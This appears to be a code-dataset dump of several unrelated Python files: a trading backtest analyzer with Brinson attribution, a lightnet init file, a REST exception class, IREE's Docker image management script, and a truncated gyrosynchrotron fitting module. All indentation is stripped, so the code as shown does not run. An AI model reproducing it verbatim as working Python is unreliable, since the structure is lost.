if self.dataview is not None and self.dataview.data_benchmark is not None:
self.data_benchmark = self.dataview.data_benchmark.loc[(self.dataview.data_benchmark.index >= self.start_date)
&(self.dataview.data_benchmark.index <= self.end_date)]
else:
benchmark = self.configs.get('benchmark', "")
if benchmark and data_server_:
df, msg = data_server_.daily(benchmark, start_date=self.closes.index[0], end_date=self.closes.index[-1])
self.data_benchmark = df.set_index('trade_date').loc[:, ['close']]
self.data_benchmark.columns = ['bench']
else:
self.data_benchmark = pd.DataFrame(index=self.closes.index, columns=['bench'], data=np.ones(len(self.closes), dtype=float))
class AlphaAnalyzer(BaseAnalyzer):
def __init__(self):
super(AlphaAnalyzer, self).__init__()
self.metrics = dict()
self.daily = None
self.returns = None # OrderedDict
self.position_change = None # OrderedDict
self.account = None # OrderedDict
self.df_brinson = None
self.data_benchmark = None
def initialize(self, data_api=None, dataview=None, file_folder='.'):
super(AlphaAnalyzer, self).initialize(data_api=data_api, dataview=dataview,
file_folder=file_folder)
if self.dataview is not None and self.dataview.data_benchmark is not None:
self.data_benchmark = self.dataview.data_benchmark.loc[(self.dataview.data_benchmark.index >= self.start_date)
&(self.dataview.data_benchmark.index <= self.end_date)]
@staticmethod
def _to_pct_return(arr, cumulative=False):
"""Convert portfolio value to portfolio (linear) return."""
r = np.empty_like(arr)
r[0] = 0.0
if cumulative:
r[1:] = arr[1:] / arr[0] - 1
else:
r[1:] = arr[1:] / arr[:-1] - 1
return r
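# Example (sketch): _to_pct_return(np.array([100., 110., 121.])) -> [0., 0.1, 0.1]
# (period-over-period); with cumulative=True it returns [0., 0.1, 0.21].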
'''
def get_returns_OLD(self, compound_return=True, consider_commission=True):
profit_col_name = 'CumProfitComm' if consider_commission else 'CumProfit'
vp_list = {sec: df_profit.loc[:, profit_col_name] for sec, df_profit in self.daily.items()}
df_profit = pd.concat(vp_list, axis=1) # this is cumulative profit
# TODO: temporary solution
df_profit = df_profit.fillna(method='ffill').fillna(0.0)
strategy_value = df_profit.sum(axis=1) + self.configs['init_balance']
market_values = pd.concat([strategy_value, self.data_benchmark], axis=1).fillna(method='ffill')
market_values.columns = ['strat', 'bench']
df_returns = market_values.pct_change(periods=1).fillna(0.0)
df_returns = df_returns.join((df_returns.loc[:, ['strat', 'bench']] + 1.0).cumprod(), rsuffix='_cum')
if compound_return:
df_returns.loc[:, 'active_cum'] = df_returns['strat_cum'] - df_returns['bench_cum'] + 1
df_returns.loc[:, 'active'] = df_returns['active_cum'].pct_change(1).fillna(0.0)
else:
df_returns.loc[:, 'active'] = df_returns['strat'] - df_returns['bench']
df_returns.loc[:, 'active_cum'] = df_returns['active'].add(1.0).cumprod(axis=0)
start = pd.to_datetime(self.configs['start_date'], format="%Y%m%d")
end = pd.to_datetime(self.configs['end_date'], format="%Y%m%d")
years = (end - start).days / 365.0
self.metrics['yearly_return'] = np.power(df_returns.loc[:, 'active_cum'].values[-1], 1. / years) - 1
self.metrics['yearly_vol'] = df_returns.loc[:, 'active'].std() * np.sqrt(225.)
self.metrics['beta'] = np.corrcoef(df_returns.loc[:, 'bench'], df_returns.loc[:, 'strat'])[0, 1]
self.metrics['sharpe'] = self.metrics['yearly_return'] / self.metrics['yearly_vol']
# bt_strat_mv = pd.read_csv('bt_strat_mv.csv').set_index('trade_date')
# df_returns = df_returns.join(bt_strat_mv, how='right')
self.returns = df_returns
'''
def _get_index_weight(self):
if self.dataview is not None:
res = self.dataview.get_ts('index_weight', start_date=self.start_date, end_date=self.end_date)
else:
res = self.data_api.get_index_weights_daily(self.universe, self.start_date, self.end_date)
return res
def _brinson(self, close, pos, index_weight, group):
"""
Brinson Attribution.
Parameters
----------
close : pd.DataFrame
Index is date, columns are symbols.
pos : pd.DataFrame
Index is date, columns are symbols.
index_weight : pd.DataFrame
Index is date, columns are symbols.
group : pd.DataFrame
Index is date, columns are symbols.
Returns
-------
dict
"""
def group_sum(df, group_daily):
groups = np.unique(group_daily.values.flatten())
mask = np.isnan(groups.astype(float))
groups = groups[np.logical_not(mask)]
res = pd.DataFrame(index=df.index, columns=groups, data=np.nan)
for g in groups:
mask = group_daily == g
tmp = df[mask]
res.loc[:, g] = tmp.sum(axis=1)
return res
ret = close.pct_change(1)
pos_sum = pos.sum(axis=1)
pf_weight = pos.div(pos_sum, axis=0)
pf_weight.loc[pos_sum == 0, :] = 0.0
assert pf_weight.isnull().sum().sum() == 0
pf_weight = pf_weight.reindex(index=ret.index, columns=ret.columns)
pf_weight = pf_weight.fillna(0.0)
weighted_ret_pf = ret.mul(pf_weight)
weighted_ret_index = ret.mul(index_weight)
index_group_weight = group_sum(index_weight, group)
pf_group_weight = group_sum(pf_weight, group)
pf_group_ret = group_sum(weighted_ret_pf, group).div(pf_group_weight)
index_group_ret = group_sum(weighted_ret_index, group).div(index_group_weight)
allo_ret_group = (pf_group_weight - index_group_weight).mul(index_group_ret)
allo_ret = allo_ret_group.sum(axis=1)
selection_ret_group = (pf_group_ret - index_group_ret).mul(index_group_weight)
selection_ret = selection_ret_group.sum(axis=1)
active_ret = (weighted_ret_pf.sum(axis=1) - weighted_ret_index.sum(axis=1))
inter_ret = active_ret - selection_ret - allo_ret
df_brinson = pd.DataFrame(index=allo_ret.index,
data={'allocation': allo_ret,
'selection': selection_ret,
'interaction': inter_ret,
'total_active': active_ret})
return {'df_brinson': df_brinson, 'allocation': allo_ret_group, 'selection': selection_ret_group}
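# Note on the decomposition above (illustrative summary): total_active equals
# allocation + selection + interaction, where allocation rewards over/under-weighting a
# group relative to the index, selection rewards out-performance within a group, and
# interaction absorbs the cross term.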
def brinson(self, group):
"""
Parameters
----------
group : str or pd.DataFrame
If group is string, this function will try to fetch the corresponding DataFrame from DataView.
If group is pd.DataFrame, it will be used as-is.
Returns
-------
"""
if isinstance(group, str):
group = self.dataview.get_ts(group, start_date=self.start_date, end_date=self.end_date)
elif isinstance(group, pd.DataFrame):
pass
else:
raise ValueError("Group must be string or DataFrame. But {} is provided.".format(group))
if group is None or group.empty:
raise ValueError("group is None or group is empty")
close = self.closes_adj
pos = self.daily_position
index_weight = self._get_index_weight()
res_dic = self._brinson(close, pos, index_weight, group)
df_brinson = res_dic['df_brinson']
self.df_brinson = df_brinson
self.report_dic['df_brinson'] = df_brinson
plot_brinson(df_brinson, save_folder=self.file_folder)
def do_analyze(self, result_dir, selected_sec=None, brinson_group=None):
if selected_sec is None:
selected_sec = []
print("process trades...")
self.process_trades()
print("get daily stats...")
self.get_daily()
print("calc strategy return...")
self.get_returns(consider_commission=False)
not_none_sec = []
if len(selected_sec) > 0:
print("Plot single securities PnL")
for symbol in selected_sec:
df_daily = self.daily.loc[pd.IndexSlice[symbol, :], :]
df_daily.index = df_daily.index.droplevel(0)
if df_daily is not None:
not_none_sec.append(symbol)
plot_trades(df_daily, symbol=symbol, save_folder=self.file_folder)
print("Plot strategy PnL...")
self.plot_pnl(result_dir)
if brinson_group is not None:
print("Do brinson attribution.")
group = self.dataview.get_ts(brinson_group)
if group is None:
raise ValueError("group data is None.")
self.brinson(group)
print("generate report...")
self.gen_report(source_dir=STATIC_FOLDER, template_fn='report_template.html',
out_folder=result_dir,
selected=not_none_sec)
def plot_daily_trading_holding_pnl(trading, holding, total, total_cum):
"""
Parameters
----------
Series
"""
idx0 = total.index
n = len(idx0)
idx = np.arange(n)
fig, (ax0, ax2, ax3) = plt.subplots(3, 1, figsize=(16, 13.5), sharex=True)
ax1 = ax0.twinx()
bar_width = 0.4
profit_color, lose_color = '#D63434', '#2DB635'
curve_color = '#174F67'
y_label = 'Profit / Loss ($)'
color_arr_raw = np.array([profit_color] * n)
color_arr = color_arr_raw.copy()
color_arr[total < 0] = lose_color
ax0.bar(idx, total, width=bar_width, color=color_arr)
ax0.set(title='Daily PnL', ylabel=y_label, xlim=[-2, n+2],)
ax0.xaxis.set_major_formatter(MyFormatter(idx0, '%y-%m-%d'))
ax1.plot(idx, total_cum, lw=1.5, color=curve_color)
ax1.set(ylabel='Cum. ' + y_label)
ax1.yaxis.label.set_color(curve_color)
color_arr = color_arr_raw.copy()
color_arr[trading < 0] = lose_color
ax2.bar(idx-bar_width/2, trading, width=bar_width, color=color_arr)
ax2.set(title='Daily Trading PnL', ylabel=y_label)
color_arr = color_arr_raw.copy()
color_arr[holding < 0] = lose_color
ax3.bar(idx+bar_width/2, holding, width=bar_width, color=color_arr)
ax3.set(title='Daily Holding PnL', ylabel=y_label, xticks=idx[: : n//10])
return fig
def plot_portfolio_bench_pnl(portfolio_cum_ret, benchmark_cum_ret, excess_cum_ret):
"""
Parameters
----------
Series
"""
fig, (ax1, ax2) = plt.subplots(2, 1, figsize=(16, 9), sharex=True)
idx_dt = portfolio_cum_ret.index
idx = np.arange(len(idx_dt))
y_label_ret = "Cumulative Return (%)"
ax1.plot(idx, (benchmark_cum_ret-1) * TO_PCT, label='Benchmark', color='#174F67')
ax1.plot(idx, (portfolio_cum_ret-1) * TO_PCT, label='Strategy', color='#198DD6')
ax1.legend(loc='upper left')
ax1.set(title="Absolute Return of Portfolio and Benchmark",
#xlabel="Date",
ylabel=y_label_ret)
ax1.grid(axis='y')
ax2.plot(idx, (excess_cum_ret-1) * TO_PCT, label='Extra Return', color='#C37051')
ax2.set(title="Excess Return Compared to Benchmark", ylabel=y_label_ret
#xlabel="Date",
)
ax2.grid(axis='y')
ax2.xaxis.set_major_formatter(MyFormatter(idx_dt, '%y-%m-%d')) # 17-09-31
fig.tight_layout()
return fig
def plot_brinson(df, save_folder):
"""
Parameters
----------
df : pd.DataFrame
"""
allo, selec, inter, total = df['allocation'], df['selection'], df['interaction'], df['total_active']
fig, ax1 = plt.subplots(1, 1, figsize=(21, 8))
idx0 = df.index
idx = range(len(idx0))
ax1.plot(idx, selec, lw=1.5, color='indianred', label='Selection Return')
ax1.plot(idx, allo, lw=1.5, color='royalblue', label='Allocation Return')
ax1.plot(idx, inter, lw=1.5, color='purple', label='Interaction Return')
# ax1.plot(idx, total, lw=1.5, ls='--', color='k', label='Total Active Return')
ax1.axhline(0.0, color='k', lw=0.5, ls='--')
ax1.legend(loc='upper left')
ax1.set_xlabel("Date")
ax1.set_ylabel("Return")
ax1.xaxis.set_major_formatter(MyFormatter(idx0, '%Y-%m-%d'))
plt.tight_layout()
fig.savefig(os.path.join(save_folder, 'brinson_attribution.png'))
plt.close()
def calc_avg_pos_price(pos_arr, price_arr):
"""
Calculate average cost price using position and fill price.
When position = 0, cost price = symbol price.
"""
assert len(pos_arr) == len(price_arr)
avg_price = np.zeros_like(pos_arr, dtype=float)
avg_price[0] = price_arr[0]
for i in range(pos_arr.shape[0] - 1):
if pos_arr[i+1] == 0:
avg_price[i+1] = 0.0
else:
pos_diff = pos_arr[i+1] - pos_arr[i]
if pos_arr[i] == 0 or pos_diff * pos_arr[i] > 0:
count = True
else:
count = False
if count:
avg_price[i+1] = (avg_price[i] * pos_arr[i] + pos_diff * price_arr[i+1]) * 1. / pos_arr[i+1]
else:
avg_price[i+1] = avg_price[i]
return avg_price
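# Example (sketch): a position built up in two fills and then flattened.
#   calc_avg_pos_price(np.array([100, 200, 0]), np.array([10., 11., 12.]))
#   -> array([10. , 10.5, 0. ])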
def plot_trades(df, symbol="", save_folder='.', marker_size_adjust_ratio=0.1):
old_mpl_rcparams = {k: v for k, v in mpl.rcParams.items()}
mpl.rcParams.update(MPL_RCPARAMS)
idx0 = df.index
idx = range(len(idx0))
price = df.loc[:, 'close']
bv, sv = df.loc[:, 'BuyVolume'].values, df.loc[:, 'SellVolume'].values
profit = df.loc[:, 'CumProfit'].values
avgpx = df.loc[:, 'AvgPosPrice']
bv_m = np.max(bv)
sv_m = np.max(sv)
if bv_m > 0:
bv = bv / bv_m * 100
if sv_m > 0:
sv = sv / sv_m * 100
fig = plt.figure(figsize=(14, 10))
ax1 = plt.subplot2grid((4, 1), (0, 0), rowspan=3)
ax3 = plt.subplot2grid((4, 1), (3, 0), rowspan=1, sharex=ax1)
ax2 = ax1.twinx()
ax1.plot(idx, price, label='Price', linestyle='-', lw=1, marker='', color='yellow')
ax1.scatter(idx, price, label='buy', marker='o', s=bv, color='indianred')
ax1.scatter(idx, price, label='sell', marker='o', s=sv, color='forestgreen')
ax1.plot(idx, avgpx, lw=1, marker='', color='green')
ax1.legend(loc='upper left')
ax1.set(title="Price, Trades and PnL for {:s}".format(symbol), ylabel="Price ($)")
ax1.xaxis.set_major_formatter(MyFormatter(idx0, '%Y-%m'))
ax2.plot(idx, profit, label='PnL', color='k', lw=1, ls='--', alpha=.4)
ax2.legend(loc='upper right')
ax2.set(ylabel="Profit / Loss ($)")
# ax1.xaxis.set_major_formatter(MyFormatter(df.index))#, '%H:%M'))
ax3.plot(idx, df.loc[:, 'position'], marker='D', markersize=3, lw=2)
ax3.axhline(0, color='k', lw=1, ls='--', alpha=0.8)
ax3.set(title="Position of {:s}".format(symbol))
fig.tight_layout()
fig.savefig(save_folder + '/' + "{}.png".format(symbol), facecolor=fig.get_facecolor(), dpi=fig.get_dpi())
mpl.rcParams.update(old_mpl_rcparams)
| 2.171875 | 2 |
lightnet/data/transform/__init__.py | eavise-kul/lightnet | 6 | 11352 | #
# Lightnet data transforms
# Copyright EAVISE
#
from .pre import *
from .post import *
from .util import *
| 0.863281 | 1 |
ufdl-core-app/src/ufdl/core_app/exceptions/_BadSource.py | waikato-ufdl/ufdl-backend | 0 | 11353 | from rest_framework import status
from rest_framework.exceptions import APIException
class BadSource(APIException):
"""
Exception for when a lazily-loaded data source can't
be accessed for some reason
"""
status_code = status.HTTP_417_EXPECTATION_FAILED
default_code = 'bad_source'
def __init__(self, source: str, reason: str):
super().__init__(f"Bad source '{source}': {reason}")
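# Usage sketch (not from the original module): a view that fails to materialise a
# lazily-loaded file could raise BadSource(source_url, "connection refused"); DRF then
# returns an HTTP 417 response carrying the message formatted above.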
| 2.53125 | 3 |
build_tools/docker/manage_images.py | BernhardRiemann/iree | 1 | 11354 | <filename>build_tools/docker/manage_images.py
#!/usr/bin/env python3
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Manages IREE Docker image definitions.
Includes information on their dependency graph and GCR URL.
Example usage:
Rebuild the cmake image and all images that transitively depend on it,
tagging them with `latest`:
python3 build_tools/docker/manage_images.py --build --image cmake
Print out output for rebuilding the cmake image and all images that
transitively depend on it, but don't take side-effecting actions:
python3 build_tools/docker/manage_images.py --build --image cmake --dry-run
Push all `prod` images to GCR:
python3 build_tools/docker/manage_images.py --push --tag prod --images all
Rebuild and push all images and update references to them in the repository:
python3 build_tools/docker/manage_images.py --push --images all
--update-references
"""
import argparse
import fileinput
import os
import posixpath
import re
import subprocess
import sys
IREE_GCR_URL = 'gcr.io/iree-oss/'
DOCKER_DIR = 'build_tools/docker/'
# Map from image names to images that they depend on.
IMAGES_TO_DEPENDENCIES = {
'base': [],
'bazel': ['base', 'util'],
'bazel-python': ['bazel'],
'bazel-tensorflow': ['bazel-python'],
'bazel-tensorflow-nvidia': ['bazel-tensorflow-vulkan'],
'bazel-tensorflow-swiftshader': ['bazel-tensorflow-vulkan', 'swiftshader'],
'bazel-tensorflow-vulkan': ['bazel-tensorflow'],
'cmake': ['base', 'util'],
'cmake-android': ['cmake', 'util'],
'cmake-python': ['cmake'],
'cmake-python-nvidia': ['cmake-python-vulkan'],
'cmake-python-swiftshader': ['cmake-python-vulkan', 'swiftshader'],
'cmake-python-vulkan': ['cmake-python'],
'rbe-toolchain': [],
'swiftshader': ['cmake'],
'util': [],
}
IMAGES_TO_DEPENDENT_IMAGES = {k: [] for k in IMAGES_TO_DEPENDENCIES}
for image, dependencies in IMAGES_TO_DEPENDENCIES.items():
for dependency in dependencies:
IMAGES_TO_DEPENDENT_IMAGES[dependency].append(image)
IMAGES_HELP = [f'`{name}`' for name in IMAGES_TO_DEPENDENCIES]
IMAGES_HELP = f'{", ".join(IMAGES_HELP)} or `all`'
def parse_arguments():
"""Parses command-line options."""
parser = argparse.ArgumentParser(
description="Build IREE's Docker images and optionally push them to GCR.")
parser.add_argument(
'--images',
'--image',
type=str,
required=True,
action='append',
help=f'Name of the image to build: {IMAGES_HELP}.')
parser.add_argument(
'--tag',
type=str,
default='latest',
help='Tag for the images to build. Defaults to `latest` (which is good '
'for testing changes in a PR). Use `prod` to update the images that the '
'CI caches.')
parser.add_argument(
'--pull',
action='store_true',
help='Pull the specified image before building.')
parser.add_argument(
'--build',
action='store_true',
help='Build new images from the current Dockerfiles.')
parser.add_argument(
'--push',
action='store_true',
help='Push the built images to GCR. Requires gcloud authorization.')
parser.add_argument(
'--update_references',
'--update-references',
action='store_true',
help='Update all references to the specified images to point at the new'
' digest.')
parser.add_argument(
'--dry_run',
'--dry-run',
'-n',
action='store_true',
help='Print output without building or pushing any images.')
args = parser.parse_args()
for image in args.images:
if image == 'all':
# Sort for a deterministic order
args.images = sorted(IMAGES_TO_DEPENDENCIES.keys())
elif image not in IMAGES_TO_DEPENDENCIES:
raise parser.error('Expected --image to be one of:\n'
f' {IMAGES_HELP}\n'
f'but got `{image}`.')
return args
def get_ordered_images_to_process(images):
unmarked_images = list(images)
# Python doesn't have a builtin OrderedSet
marked_images = set()
order = []
def visit(image):
if image in marked_images:
return
for dependent_images in IMAGES_TO_DEPENDENT_IMAGES[image]:
visit(dependent_images)
marked_images.add(image)
order.append(image)
while unmarked_images:
visit(unmarked_images.pop())
order.reverse()
return order
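# For example (derived from IMAGES_TO_DEPENDENCIES above): processing ['cmake'] also
# schedules its dependents such as 'cmake-python', 'cmake-android', 'swiftshader' and the
# downstream vulkan/swiftshader/nvidia variants, ordered so that every image is handled
# before any image that depends on it.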
def stream_command(command, dry_run=False):
print(f'Running: `{" ".join(command)}`')
if dry_run:
return 0
process = subprocess.Popen(
command,
bufsize=1,
stderr=subprocess.STDOUT,
stdout=subprocess.PIPE,
universal_newlines=True)
for line in process.stdout:
print(line, end='')
if process.poll() is None:
raise RuntimeError('Unexpected end of output while process is not finished')
return process.poll()
def check_stream_command(command, dry_run=False):
exit_code = stream_command(command, dry_run=dry_run)
if exit_code != 0:
print(f'Command failed with exit code {exit_code}: `{" ".join(command)}`')
sys.exit(exit_code)
def get_repo_digest(image):
inspect_command = [
'docker',
'image',
'inspect',
f'{image}',
'-f',
'{{index .RepoDigests 0}}',
]
inspect_process = subprocess.run(
inspect_command,
universal_newlines=True,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
timeout=10)
if inspect_process.returncode != 0:
print(f'Computing the repository digest for {image} failed.'
' Has it been pushed to GCR?')
print(f'Output from `{" ".join(inspect_command)}`:')
print(inspect_process.stdout, end='')
print(inspect_process.stderr, end='')
sys.exit(inspect_process.returncode)
_, repo_digest = inspect_process.stdout.strip().split('@')
return repo_digest
def update_rbe_reference(digest, dry_run=False):
print('Updating WORKSPACE file for rbe-toolchain')
for line in fileinput.input(files=['WORKSPACE'], inplace=(not dry_run)):
if line.strip().startswith('digest ='):
print(re.sub('sha256:[a-zA-Z0-9]+', digest, line), end='')
else:
print(line, end='')
def update_references(image_name, digest, dry_run=False):
print(f'Updating references to {image_name}')
grep_command = ['git', 'grep', '-l', f'{image_name}@sha256']
grep_process = subprocess.run(
grep_command,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
timeout=5,
universal_newlines=True)
if grep_process.returncode > 1:
print(f'{" ".join(grep_command)} '
f'failed with exit code {grep_process.returncode}')
sys.exit(grep_process.returncode)
if grep_process.returncode == 1:
print(f'Found no references to {image_name}')
return
files = grep_process.stdout.split()
print(f'Updating references in {len(files)} files: {files}')
for line in fileinput.input(files=files, inplace=(not dry_run)):
print(
re.sub(f'{image_name}@sha256:[a-zA-Z0-9]+', f'{image_name}@{digest}',
line),
end='')
if __name__ == '__main__':
args = parse_arguments()
# Ensure the user has the correct authorization if they try to push to GCR.
if args.push:
if stream_command(['which', 'gcloud']) != 0:
print('gcloud not found.'
' See https://cloud.google.com/sdk/install for installation.')
sys.exit(1)
check_stream_command(['gcloud', 'auth', 'configure-docker'],
dry_run=args.dry_run)
images_to_process = get_ordered_images_to_process(args.images)
print(f'Also processing dependent images. Will process: {images_to_process}')
for image in images_to_process:
print(f'Processing image {image}')
image_name = posixpath.join(IREE_GCR_URL, image)
image_tag = f'{image_name}:{args.tag}'
image_path = os.path.join(DOCKER_DIR, image)
if args.pull:
check_stream_command(['docker', 'pull', image_tag], dry_run=args.dry_run)
if args.build:
check_stream_command(['docker', 'build', '--tag', image_tag, image_path],
dry_run=args.dry_run)
if args.push:
check_stream_command(['docker', 'push', image_tag], dry_run=args.dry_run)
if args.update_references:
digest = get_repo_digest(image_tag)
# Just hardcode this oddity
if image == 'rbe-toolchain':
update_rbe_reference(digest, dry_run=args.dry_run)
update_references(image_name, digest, dry_run=args.dry_run)
| 1.898438 | 2 |
suncasa/pygsfit/gsutils.py | wyq24/suncasa | 0 | 11355 | <reponame>wyq24/suncasa<filename>suncasa/pygsfit/gsutils.py
import numpy as np
# import sys
import math
import os, sys, platform
import astropy.units as u
from sunpy import map as smap
from astropy.coordinates import SkyCoord
from suncasa.io import ndfits
import lmfit
from astropy.time import Time
import matplotlib.pyplot as plt
import matplotlib.colors as colors
import matplotlib.colorbar as colorbar
from suncasa.utils import mstools
from suncasa.utils import qlookplot as ql
from mpl_toolkits.axes_grid1 import make_axes_locatable
from tqdm import tqdm
from astropy.io import fits
import numpy.ma as ma
sys.path.append(os.path.dirname(os.path.realpath(__file__)))
import gstools
# name of the fast gyrosynchrotron codes shared library
if platform.system() == 'Linux' or platform.system() == 'Darwin':
libname = os.path.join(os.path.dirname(os.path.realpath(__file__)),
'binaries/MWTransferArr.so')
if platform.system() == 'Windows':
libname = os.path.join(os.path.dirname(os.path.realpath(__file__)),
'binaries/MWTransferArr64.dll')
def kev2k(eng):
return 11604525.00617 * eng
def ff_emission(em, T=1.e7, Z=1., mu=1.e10):
from astropy import constants as const
import astropy.units as u
T = T * u.k
mu = mu * u.Hz
esu = const.e.esu
k_B = const.k_B.cgs
m_e = const.m_e.cgs
c = const.c.cgs
bmax = (3 * k_B * T * u.k / m_e) ** 0.5 / 2.0 / np.pi / (mu * u.Hz)
bmin = Z * esu ** 2 / 3. / k_B / T
lnbb = np.log((bmax / bmin).value)
ka_mu = 1. / mu ** 2 / T ** 1.5 * (
Z ** 2 * esu ** 6 / c / np.sqrt(2. * np.pi * (m_e * k_B) ** 3)) * np.pi ** 2 / 4.0 * lnbb
# print(ka_mu, em)
opc = ka_mu * em
return T.value * (1 - np.exp(-opc.value))
def sfu2tb(freq, flux, area):
# frequency in Hz
# flux in sfu
# area: area of the radio source in arcsec^2
sfu2cgs = 1e-19
vc = 2.998e10
kb = 1.38065e-16
# sr = np.pi * (size[0] / 206265. / 2.) * (size[1] / 206265. / 2.)
sr = area / 206265. ** 2
Tb = flux * sfu2cgs * vc ** 2. / (2. * kb * freq ** 2. * sr)
return Tb
def tb2sfu(freq, tb, area):
# frequency in Hz
# brightness temperature in K
# area: area of the radio source in arcsec^2
sfu2cgs = 1e-19
vc = 2.998e10
kb = 1.38065e-16
# sr = np.pi * (size[0] / 206265. / 2.) * (size[1] / 206265. / 2.)
sr = area / 206265. ** 2
flux = tb / (sfu2cgs * vc ** 2. / (2. * kb * freq ** 2. * sr))
return flux
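# Sanity check (illustrative only): sfu2tb and tb2sfu are inverses for a fixed frequency
# and source area, e.g. tb2sfu(5e9, sfu2tb(5e9, 10.0, 100.0), 100.0) ~ 10.0 sfu.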
def initspecplot(axes, cplts):
errobjs = []
for cpltidx, cplt in enumerate(cplts):
errobjs.append(axes.errorbar([], [], yerr=[], linestyle='', marker='o', mfc='none', mec=cplt, alpha=1.0))
axes.set_yscale("log")
axes.set_xscale("log")
axes.set_xlim([1, 20])
axes.set_ylim([0.1, 1000])
axes.set_xticks([1, 5, 10, 20])
axes.set_xticklabels([1, 5, 10, 20])
axes.set_xticks([1, 5, 10, 20])
axes.set_yticks([])
axes.set_yticks([0.01, 0.1, 1, 10, 100, 1000])
axes.set_ylabel('T$_b$ [MK]')
axes.set_xlabel('Frequency [GHz]')
x = np.linspace(1, 20, 10)
for ll in [-1, 0, 1, 2, 3, 4]:
y = 10. ** (-2 * np.log10(x) + ll)
axes.plot(x, y, 'k--', alpha=0.1)
# y2 = 10. ** (-4 * np.log10(x) + ll)
# y3 = 10. ** (-8 * np.log10(x) + ll)
# ax_eospec.plot(x, y, 'k--', x, y2, 'k:', x, y3, 'k-.', alpha=0.1)
return errobjs
def set_errorobj(xout, yout, errobj, yerr=None):
eospec, dummy, (errbar_eospec,) = errobj
eospec.set_data(xout, yout)
if yerr is not None:
yerr_top = yout + yerr
yerr_bot = yout - yerr
new_segments_y = [np.array([[x, yt], [x, yb]]) for x, yt, yb in zip(xout, yerr_top, yerr_bot)]
errbar_eospec.set_segments(new_segments_y)
def mwspec2min_1src(params, freqghz, tb=None, tb_err=None, arcsec2cm=0.725e8, showplt=False):
# params are defined by lmfit.Paramters()
'''
params: parameters defined by lmfit.Paramters()
freqghz: frequencies in GHz
ssz: pixel size in arcsec
tb: reference brightness temperature in K
tb_err: uncertainties of reference brightness temperature in K
'''
from scipy import interpolate
GET_MW = gstools.initGET_MW(libname) # load the library
ssz = float(params['ssz'].value) # source area in arcsec^2
depth = float(params['depth'].value) # total source depth in arcsec
Bmag = float(params['Bmag'].value) # magnetic field strength in G
Tth = float(params['Tth'].value) # thermal temperature in MK
nth = float(params['nth'].value) # thermal density in 1e10 cm^{-3}
nrlh = 10. ** float(params['lognrlh'].value) # total nonthermal density above 0.1 MeV
delta = float(params['delta'].value) # powerlaw index
theta = float(params['theta'].value) # viewing angle in degrees
Emin = float(params['Emin'].value) # low energy cutoff of nonthermal electrons in MeV
Emax = float(params['Emax'].value) # high energy cutoff of nonthermal electrons in MeV
E_hi = 0.1
nrl = nrlh * (Emin ** (1. - delta) - Emax ** (1. - delta)) / (E_hi ** (1. - delta) - Emax ** (1. - delta))
Nf = 100 # number of frequencies
NSteps = 1 # number of nodes along the line-of-sight
N_E = 15 # number of energy nodes
N_mu = 15 # number of pitch-angle nodes
Lparms = np.zeros(11, dtype='int32') # array of dimensions etc.
Lparms[0] = NSteps
Lparms[1] = Nf
Lparms[2] = N_E
Lparms[3] = N_mu
Rparms = np.zeros(5, dtype='double') # array of global floating-point parameters
Rparms[0] = ssz * arcsec2cm ** 2 # Area, cm^2
# Rparms[0] = 1e20 # area, cm^2
Rparms[1] = 1e9 # starting frequency to calculate spectrum, Hz
Rparms[2] = 0.02 # logarithmic step in frequency
Rparms[3] = 12 # f^C
Rparms[4] = 12 # f^WH
ParmLocal = np.zeros(24, dtype='double') # array of voxel parameters - for a single voxel
ParmLocal[0] = depth * arcsec2cm / NSteps # voxel depth, cm
ParmLocal[1] = Tth * 1e6 # T_0, K
ParmLocal[2] = nth * 1e10 # n_0 - thermal electron density, cm^{-3}
ParmLocal[3] = Bmag # B - magnetic field, G
Parms = np.zeros((24, NSteps), dtype='double', order='F') # 2D array of input parameters - for multiple voxels
for i in range(NSteps):
Parms[:, i] = ParmLocal # most of the parameters are the same in all voxels
# if NSteps > 1:
# Parms[4, i] = 50.0 + 30.0 * i / (NSteps - 1) # the viewing angle varies from 50 to 80 degrees along the LOS
# else:
# Parms[4, i] = 50.0 # the viewing angle varies from 50 to 80 degrees along the LOS
Parms[4, i] = theta
# parameters of the electron distribution function
n_b = nrl # n_b - nonthermal electron density, cm^{-3}
mu_c = np.cos(np.pi * 70 / 180) # loss-cone boundary
dmu_c = 0.2 # Delta_mu
E_arr = np.logspace(np.log10(Emin), np.log10(Emax), N_E, dtype='double') # energy grid (logarithmically spaced)
mu_arr = np.linspace(-1.0, 1.0, N_mu, dtype='double') # pitch-angle grid
f0 = np.zeros((N_E, N_mu), dtype='double') # 2D distribution function array - for a single voxel
# computing the distribution function (equivalent to PLW & GLC)
A = n_b / (2.0 * np.pi) * (delta - 1.0) / (Emin ** (1.0 - delta) - Emax ** (1.0 - delta))
B = 0.5 / (mu_c + dmu_c * np.sqrt(np.pi) / 2 * math.erf((1.0 - mu_c) / dmu_c))
for i in range(N_E):
for j in range(N_mu):
amu = abs(mu_arr[j])
f0[i, j] = A * B * E_arr[i] ** (-delta) * (1.0 if amu < mu_c else np.exp(-((amu - mu_c) / dmu_c) ** 2))
f_arr = np.zeros((N_E, N_mu, NSteps), dtype='double',
order='F') # 3D distribution function array - for multiple voxels
for k in range(NSteps):
f_arr[:, :, k] = f0 # electron distribution function is the same in all voxels
RL = np.zeros((7, Nf), dtype='double', order='F') # input/output array
# calculating the emission for array distribution (array -> on)
res = GET_MW(Lparms, Rparms, Parms, E_arr, mu_arr, f_arr, RL)
if res:
# retrieving the results
f = RL[0]
I_L = RL[5]
I_R = RL[6]
if showplt:
import matplotlib.pyplot as plt
fig, ax = plt.subplots(1, 1)
ax.plot(f, I_L + I_R)
ax.set_xscale('log')
ax.set_yscale('log')
ax.set_title('Total intensity (array)')
ax.set_xlabel('Frequency, GHz')
ax.set_ylabel('Intensity, sfu')
flx_model = I_L + I_R
flx_model = np.nan_to_num(flx_model) + 1e-11
logf = np.log10(f)
logflx_model = np.log10(flx_model)
logfreqghz = np.log10(freqghz)
interpfunc = interpolate.interp1d(logf, logflx_model, kind='linear')
logmflx = interpfunc(logfreqghz)
mflx = 10. ** logmflx
mtb = sfu2tb(np.array(freqghz) * 1.e9, mflx, ssz)
else:
print("Calculation error!")
if tb is None:
